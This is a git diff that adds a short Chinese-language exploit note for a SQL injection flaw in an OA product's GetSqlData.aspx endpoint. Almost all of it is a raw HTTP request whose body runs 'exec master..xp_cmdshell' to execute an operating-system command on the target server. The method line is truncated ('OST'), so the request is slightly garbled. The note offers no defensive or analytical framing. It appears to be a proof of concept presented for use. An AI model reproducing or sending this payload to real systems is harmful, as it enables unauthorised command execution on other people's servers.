diff --git a/某和OA C6-GetSqlData.aspx SQL注入漏洞.md b/某和OA C6-GetSqlData.aspx SQL注入漏洞.md
new file mode 100644
index 0000000..0b0d7f7
--- /dev/null
+++ b/某和OA C6-GetSqlData.aspx SQL注入漏洞.md	
@@ -0,0 +1,13 @@
+## 某和OA C6-GetSqlData.aspx SQL注入漏洞
+```
+OST /C6/Control/GetSqlData.aspx/.ashx
+Host: ip:port 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
+Connection: close
+Content-Length: 189
+Content-Type: text/plain
+Accept-Encoding: gzip
+
+exec master..xp_cmdshell 'ipconfig'
+
+```